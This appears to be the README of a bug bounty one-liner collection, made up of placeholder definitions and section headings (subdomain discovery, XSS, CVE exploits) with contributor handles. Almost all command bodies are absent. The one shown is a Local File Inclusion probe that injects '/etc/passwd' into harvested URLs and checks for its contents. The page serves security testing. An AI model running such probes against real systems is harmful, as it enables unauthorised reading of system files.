Awesome One-liner Bug Bounty

A collection of awesome one-liner scripts especially for bug bounty.

This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome.

Definitions

This section defines specific terms or placeholders that are used throughout one-line command/scripts.

  • 1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.

  • 1.2. "HOSTS.txt" contains criteria 1.1 with more than one in file.

  • 2.1. "URL" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.

  • 2.2. "URLS.txt" contains criteria 2.1 with more than one in file.

  • 3.1. "FILE.txt" or "FILE{N}.txt" means the files needed to run the command/script according to its context and needs.

  • 4.1. "OUT.txt" or "OUT{N}.txt" means the file as the target storage result will be the command that is executed.


Local File Inclusion

@dwisiswant0

gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Open-redirect

@dwisiswant0

@N3T_hunt3r

XSS

@cihanmehmet

@fanimalikhack

@oliverrickfors

Prototype Pollution

@R0X4R

CVE-2020-5902

@Madrobot_

CVE-2020-3452

@vict0ni

CVE-2022-0378

@7h3h4ckv157

vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution

@Madrobot_

Find JavaScript Files

@D0cK3rG33k

Extract Endpoints from JavaScript

@renniepak

Get CIDR & Org Information from Target Lists

@steve_mcilwain

Get Subdomains from RapidDNS.io

@andirrahmani1

Get Subdomains from BufferOver.run

@_ayoubfathi_

@AnubhavSingh_

Get Subdomains from Riddler.io

@pikpikcu

Get Subdomains from VirusTotal

@pikpikcu

Get Subdomain with cyberxplore

@pikpikcu

Get Subdomains from CertSpotter

@caryhooper

Get Subdomains from Archive

@pikpikcu

Get Subdomains from JLDC

@pikpikcu

Get Subdomains from securitytrails

@pikpikcu

Bruteforcing Subdomain using DNS Over

@pikpikcu

Get Subdomains With sonar.omnisint.io

@pikpikcu

Get Subdomains With synapsint.com

@pikpikcu

Get Subdomains from crt.sh

@vict0ni

Sort & Tested Domains from Recon.dev

@stokfedrik

Subdomain Bruteforcer with FFUF

@GochaOqradze

Find Allocated IP Ranges for ASN from IP Address

wains.be

Extract IPs from a File

@emenalf

Ports Scan without CloudFlare

@dwisiswant0

Create Custom Wordlists

@tomnomnom

Extracts Juicy Informations

@Prial Islam Khan

Find Subdomains TakeOver

@hahwul

Dump Custom URLs from ParamSpider

@hahwul

URLs Probing with cURL + Parallel

@akita_zen

Dump In-scope Assets from chaos-bugbounty-list

@dwisiswant0

Dump In-scope Assets from bounty-targets-data

@dwisiswant0

HackerOne Programs

BugCrowd Programs

Intigriti Programs

YesWeHack Programs

HackenProof Programs

Federacy Programs

Dump URLs from sitemap.xml

@healthyoutlet

Pure Bash Linkfinder

@ntrzz

Extract Endpoints from swagger.json

@zer0pwn

CORS Misconfiguration

@manas_hunter

Find Hidden Servers and/or Admin Panels

@rez0__

Recon Using api.recon.dev

@z0idsec

Find Live Host/Domain/Assets

@YashGoti

XSS without gf

@HacktifyS

Get Subdomains from IPs

@laughface809

Gather Domains from Content-Security-Policy

@geeknik

Nmap IP:PORT Parser Piped to HTTPX

@dwisiswant0

Last updated